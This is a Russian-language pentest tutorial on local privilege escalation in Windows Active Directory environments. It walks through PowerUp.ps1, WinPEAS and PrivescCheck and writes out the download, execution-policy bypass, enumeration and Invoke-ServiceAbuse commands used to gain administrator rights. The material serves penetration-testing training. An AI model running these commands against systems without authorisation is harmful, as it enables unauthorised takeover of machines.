Локальное повышение привилегий при пентесте Active Directory (AD) — это важный аспект ИБ, который часто используется для получения расширенного доступа к системам Windows. В статье расскажу о своем опыте применения различных техник и инструментов для выявления уязвимостей, позволяющих повысить уровень привилегий. Мы рассмотрим три инструмента: PowerUp.ps1, WinPEAS и PrivescCheck.
Еще по теме: Повышение привилегий через мисконфиг AD
Повышение привилегий при пентесте AD
Суть локального повышения привилегий заключается в том, что пользователь или атакующий, уже имеющий некоторый уровень доступа к системе (например, права обычного пользователя), может повысить свои привилегии до уровня администратора или root.
Статья в образовательных целях, для обучения этичных хакеров (пентестеров). Несанкционированный взлом компьютер является незаконным и рассматривается как уголовное преступление. Ни редакция spy-soft.net, ни автор не несут ответственности за ваши действия.
Существует несколько распространенных техник для достижения этой цели:
- Эксплуатация уязвимостей в программном обеспечении.
- Использование неправильно настроенных разрешений.
- DLL-хайджекинг.
- Небезопасные настройки реестра.
В качестве стенда для атак на Active Directory рекомендую использовать намеренно уязвимый инструмент Vulnerable-AD.
PowerUp.ps1
Начнем с PowerUp.ps1 — скрипт PowerShell из набора инструментов PowerSploit. Он отлично подходит для обнаружения возможностей повышения привилегий в Windows. Вот как использовать PowerUp.ps1:
Скачиваем скрипт:
1 |
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1 |
или так:
1 |
Invoke-WebRequest -Uri https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1 -OutFile PowerUp.ps1 -UseBasicParsing |
Затем настраиваем политику выполнения и импортируем модуль:
1 |
Set-ExecutionPolicy Unrestricted -Scope Process |
или
1 2 |
Powershell -ep bypass Import-Module .\PowerUp.ps1 |
Теперь можно запустить проверки:
1 2 3 4 |
Invoke-AllChecks - запуск всех доступных проверок для повышения привилегий Get-ModifiableServiceFile -Verbose - перечисление служб, где текущий пользователь может вносить изменения в исполняемый файл службы Get-ModifiableService Invoke-ServiceAbuse -Name 'Acunetix Database' -UserName wathonelocal\thiri -Verbose - команда локального повышения привилегий net localgroup administrators - проверка членства в группе администраторов |
Про инструмент PowerUp.ps1 мы рассказывали в статье «Автоматизация повышения привилегий Windows».
WinPEAS
Перейдем к WinPEAS. Это отличный инструмент для перечисления потенциальных векторов повышения привилегий в Windows. Вот как его использовать:
Скачиваем файл winPEAS.exe с GitHub.
Запускаем его с повышенными привилегиями:
1 |
.\winPEAS.exe |
WinPEAS проведет множество проверок и выдаст подробный отчет о возможных уязвимостях и неправильных настройках.
Подробнее про использование WinPEAS в статье «Повышение привилегий в Windows используя WinPEAS».
PrivescCheck
Наконец, PrivescCheck — еще один полезный скрипт для перечисления возможностей повышения привилегий в Windows.
Скачиваем скрипт с GitHub.
Открывем PowerShell и настраиваем политику выполнения:
1 |
powershell -ep bypass |
Переходим в директорию со скриптом и запускаем его:
1 2 |
.\PrivescCheck.ps1 Invoke-PrivescCheck |
PrivescCheck проведет ряд проверок и предоставит подробный отчет о потенциальных проблемах безопасности.
Заключение
Использование этих инструментов в комплексе дает мне всестороннее представление о возможных векторах атаки для повышения привилегий в Windows. Каждый инструмент имеет свои сильные стороны, и вместе они создают методологию для выявления и эксплуатации уязвимостей.
ПОЛЕЗНЫЕ ССЫЛКИ: